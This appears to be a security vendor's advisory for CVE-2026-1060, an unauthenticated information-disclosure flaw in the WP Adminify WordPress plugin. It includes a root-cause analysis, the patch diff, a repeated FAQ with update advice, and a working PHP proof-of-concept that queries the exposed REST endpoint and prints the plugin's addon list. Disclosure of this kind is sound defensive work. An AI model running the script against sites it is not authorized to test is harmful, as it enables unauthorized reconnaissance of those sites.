What is CVE-2026-1060?

CVE-2026-1060 is a medium-severity vulnerability in the WP Adminify WordPress plugin that allows unauthenticated attackers to access sensitive information via the ‘/wp-json/adminify/v1/get-addons-list’ REST API endpoint. This endpoint improperly allows access without authentication, exposing addon names, versions, and download URLs.

Who is affected by this vulnerability?

Any WordPress site using the WP Adminify plugin version 4.0.7.7 or earlier is affected by this vulnerability. Administrators can check their plugin version in the WordPress dashboard under ‘Plugins’.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, navigate to the ‘Plugins’ section in your WordPress admin panel. Look for the WP Adminify plugin and verify that the version is 4.0.7.7 or earlier.

What should I do if my site is vulnerable?

If your site is vulnerable, you should update the WP Adminify plugin to version 4.0.7.8 or later, where the vulnerability has been patched. Regularly updating plugins is a best practice for WordPress security.

What does the CVSS score of 5.3 mean?

A CVSS score of 5.3 indicates a medium-severity vulnerability. This means that while the vulnerability does not allow for direct exploitation such as remote code execution, it does pose a risk of information disclosure that could aid in further attacks.

How does the vulnerability work?

The vulnerability arises from the ‘permission_callback’ for the REST API endpoint being set to ‘__return_true’, which allows any user, including unauthenticated ones, to access the endpoint. This results in sensitive information about the plugin’s addons being exposed.

What is the proof of concept for this vulnerability?

The proof of concept involves sending a simple HTTP GET request to the vulnerable REST API endpoint. This request can be made without authentication, and it will return a JSON object containing sensitive information about the WP Adminify addons.

What information is exposed through this vulnerability?

The exposed information includes the complete list of available addons for WP Adminify, their installation status, version numbers, and download URLs. This data can be used by attackers to identify potential weaknesses.

How was the vulnerability patched?

The vulnerability was patched in version 4.0.7.8 by changing the ‘permission_callback’ for the ‘get-addons-list’ endpoint from ‘__return_true’ to a proper callback that checks for administrator privileges, thereby restricting access.

What are the potential risks of exploitation?

While exploitation does not lead to direct privilege escalation or remote code execution, it allows attackers to gather information that can facilitate further attacks, such as targeting known vulnerabilities in specific addon versions.

How can I mitigate the risk of similar vulnerabilities?

To mitigate risks, regularly update all WordPress plugins and themes, monitor security advisories, and implement security measures such as firewalls and access controls. Regular security audits can also help identify vulnerabilities.

Where can I find more information about this vulnerability?

For more detailed information, you can refer to the official CVE database, security blogs, or the WP Adminify plugin documentation. Staying informed about security updates and best practices is crucial for maintaining a secure WordPress site.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1060: WP Adminify <= 4.0.7.7 – Unauthenticated Sensitive Information Exposure via 'get-addons-list' REST API (adminify)

CVE ID CVE-2026-1060

Plugin adminify

Severity Medium (CVSS 5.3)

CWE 200

Vulnerable Version 4.0.7.7

Patched Version 4.0.7.8

Disclosed January 26, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1060:
This vulnerability is an unauthenticated sensitive information exposure in the WP Adminify WordPress plugin. The flaw resides in a REST API endpoint that insecurely exposes the plugin’s addon list, installation status, and metadata. The CVSS score of 5.3 reflects a medium-severity information disclosure risk.

The root cause is an improper permission check on the `/wp-json/adminify/v1/get-addons-list` REST API endpoint. In the vulnerable code in `/adminify/Libs/Addons.php`, the `register_rest_route` call for this endpoint sets its `permission_callback` to `’__return_true’`. This hardcoded value unconditionally grants access to any request, bypassing any authentication or authorization. The commented-out line `’permission_callback’ => [$this, ‘adminify_is_admin_user’],` shows the intended, secure configuration was present but disabled.

Exploitation is straightforward. An attacker sends a simple HTTP GET request to the vulnerable REST endpoint. No authentication, special headers, or parameters are required. The attack vector is the direct URL: `https://target-site.com/wp-json/adminify/v1/get-addons-list`. The server responds with a JSON object containing the complete list of WP Adminify addons, each entry detailing the addon name, slug, version, download URL, and installation status.

The patch, applied in version 4.0.7.8, corrects the `permission_callback` for the `get-addons-list` endpoint. The diff shows the line `’permission_callback’ => ‘__return_true’,` was replaced with `’permission_callback’ => [$this, ‘adminify_is_admin_user’],`. This change delegates the access decision to the `adminify_is_admin_user()` method, which presumably checks for appropriate administrator privileges before allowing the callback function `jltwp_adminify_get_addons_plugins_list` to execute and return data.

Successful exploitation allows an unauthenticated attacker to retrieve sensitive information about the site’s WP Adminify plugin ecosystem. The exposed addon list, versions, and download URLs could aid in reconnaissance for further attacks, such as targeting known vulnerabilities in specific addon versions. While not directly enabling privilege escalation or remote code execution, this information exposure reduces the attacker’s effort in profiling the target and planning subsequent intrusion steps.

Differential between vulnerable and patched code

Code Diff

--- a/adminify/Inc/Classes/Notifications/Latest_Updates.php
+++ b/adminify/Inc/Classes/Notifications/Latest_Updates.php
@@ -58,7 +58,7 @@
 		{
 			if("dismissed" !== get_option('_wpadminify_plugin_update_info_notice', true )){
 				$jltwp_adminify_changelog_message = sprintf(
-					__('%3$s %4$s %5$s <br> <strong>Check Changelogs for </strong> <a href="%1$s" target="__blank">%2$s</a>', 'adminify'),
+					__('%3$s %4$s <br> <strong>Check Changelogs for </strong> <a href="%1$s" target="__blank">%2$s</a>', 'adminify'),
 					esc_url_raw('https://wpadminify.com/changelogs'),
 					__('More about Updates ', 'adminify'),
 					/** Changelog Items
@@ -66,8 +66,7 @@
 					 */

 					'<h3 class="adminify-update-head">' . WP_ADMINIFY . ' <span><small><em>v' . esc_html(WP_ADMINIFY_VER) . '</em></small>' . __(' has some updates..', 'adminify') . '</span></h3><br>', // %3$s
-					__('<span class="dashicons dashicons-yes"></span> <span class="adminify-changes-list"> <strong>Fixed:</strong> WP Dashboard Notes plugin "+ Add Note" button trigger issue fixed. </span><br>', 'adminify'),
-					__('<span class="dashicons dashicons-yes"></span> <span class="adminify-changes-list"> <strong>Fixed:</strong> Admin bar menu some anchor tag mouse cursor style issue fixed. </span><br>', 'adminify'),
+					__('<span class="dashicons dashicons-yes"></span> <span class="adminify-changes-list"> <strong>Security:</strong> Security updated. </span><br>', 'adminify'),
 				);
 				printf(wp_kses_post($jltwp_adminify_changelog_message));
 			}
--- a/adminify/Libs/Addons.php
+++ b/adminify/Libs/Addons.php
@@ -54,8 +54,7 @@
             register_rest_route('adminify/v1', '/get-addons-list', array(
                 'methods'             => 'GET',
                 'callback'            => [$this, 'jltwp_adminify_get_addons_plugins_list'],
-                // 'permission_callback' => [$this, 'adminify_is_admin_user'],
-                'permission_callback' => '__return_true',
+                'permission_callback' => [$this, 'adminify_is_admin_user'],
             ));

             register_rest_route('adminify/v1', '/install-addons', array(
--- a/adminify/adminify.php
+++ b/adminify/adminify.php
@@ -5,7 +5,7 @@
  * Description: WP Adminify is a powerful plugin that modernizes and customizes your WordPress admin dashboard. It offers a clean, branded interface and advanced menu management features to enhance your admin user experience.
  * Plugin URI: https://wpadminify.com
  * Author: Jewel Theme
- * Version: 4.0.7.7
+ * Version: 4.0.7.8
  * Author URI: https://wpadminify.com
  * License:     GPLv3 or later
  * License URI: https://www.gnu.org/licenses/gpl-3.0.html

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1060 - WP Adminify <= 4.0.7.7 - Unauthenticated Sensitive Information Exposure via 'get-addons-list' REST API

<?php

// Configuration: Set the target WordPress site URL.
$target_url = 'https://example.com';

// Construct the full URL for the vulnerable REST API endpoint.
$api_endpoint = rtrim($target_url, '/') . '/wp-json/adminify/v1/get-addons-list';

// Initialize a cURL session.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $api_endpoint);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
// The endpoint uses the GET method and requires no authentication.
curl_setopt($ch, CURLOPT_HTTPGET, true);

// Execute the request and capture the response.
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check for cURL errors.
if (curl_errno($ch)) {
    echo 'cURL Error: ' . curl_error($ch) . "n";
    curl_close($ch);
    exit(1);
}
curl_close($ch);

// Output the results.
echo "Target: " . $target_url . "n";
echo "Endpoint: " . $api_endpoint . "n";
echo "HTTP Status Code: " . $http_code . "nn";

if ($http_code == 200 && !empty($response)) {
    $data = json_decode($response, true);
    if (json_last_error() === JSON_ERROR_NONE) {
        echo "[SUCCESS] Vulnerable endpoint accessed. Retrieved addon list.n";
        echo "Addon Count: " . count($data) . "n";
        echo "Sample Data:n";
        // Print the first addon entry as a sample.
        if (!empty($data)) {
            $first_key = array_key_first($data);
            print_r($data[$first_key]);
        }
    } else {
        echo "[INFO] Received non-JSON response. Raw output:n";
        echo $response . "n";
    }
} else {
    echo "[INFO] Request failed or endpoint not vulnerable (HTTP $http_code).n";
    if (!empty($response)) {
        echo "Response Body:n" . $response . "n";
    }
}

?>

Frequently Asked Questions

What is CVE-2026-1060?
Overview of the vulnerability
CVE-2026-1060 is a medium-severity vulnerability in the WP Adminify WordPress plugin that allows unauthenticated attackers to access sensitive information via the ‘/wp-json/adminify/v1/get-addons-list’ REST API endpoint. This endpoint improperly allows access without authentication, exposing addon names, versions, and download URLs.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the WP Adminify plugin version 4.0.7.7 or earlier is affected by this vulnerability. Administrators can check their plugin version in the WordPress dashboard under ‘Plugins’.
How can I check if my site is vulnerable?
Steps to verify plugin version
To determine if your site is vulnerable, navigate to the ‘Plugins’ section in your WordPress admin panel. Look for the WP Adminify plugin and verify that the version is 4.0.7.7 or earlier.
What should I do if my site is vulnerable?
Immediate actions to take
If your site is vulnerable, you should update the WP Adminify plugin to version 4.0.7.8 or later, where the vulnerability has been patched. Regularly updating plugins is a best practice for WordPress security.
What does the CVSS score of 5.3 mean?
Understanding severity levels
A CVSS score of 5.3 indicates a medium-severity vulnerability. This means that while the vulnerability does not allow for direct exploitation such as remote code execution, it does pose a risk of information disclosure that could aid in further attacks.
How does the vulnerability work?
Mechanics of the exploitation
The vulnerability arises from the ‘permission_callback’ for the REST API endpoint being set to ‘__return_true’, which allows any user, including unauthenticated ones, to access the endpoint. This results in sensitive information about the plugin’s addons being exposed.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept involves sending a simple HTTP GET request to the vulnerable REST API endpoint. This request can be made without authentication, and it will return a JSON object containing sensitive information about the WP Adminify addons.
What information is exposed through this vulnerability?
Details of the sensitive data
The exposed information includes the complete list of available addons for WP Adminify, their installation status, version numbers, and download URLs. This data can be used by attackers to identify potential weaknesses.
How was the vulnerability patched?
Details of the fix
The vulnerability was patched in version 4.0.7.8 by changing the ‘permission_callback’ for the ‘get-addons-list’ endpoint from ‘__return_true’ to a proper callback that checks for administrator privileges, thereby restricting access.
What are the potential risks of exploitation?
Consequences of the vulnerability
While exploitation does not lead to direct privilege escalation or remote code execution, it allows attackers to gather information that can facilitate further attacks, such as targeting known vulnerabilities in specific addon versions.
How can I mitigate the risk of similar vulnerabilities?
Best practices for WordPress security
To mitigate risks, regularly update all WordPress plugins and themes, monitor security advisories, and implement security measures such as firewalls and access controls. Regular security audits can also help identify vulnerabilities.
Where can I find more information about this vulnerability?
Resources for further reading
For more detailed information, you can refer to the official CVE database, security blogs, or the WP Adminify plugin documentation. Staying informed about security updates and best practices is crucial for maintaining a secure WordPress site.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations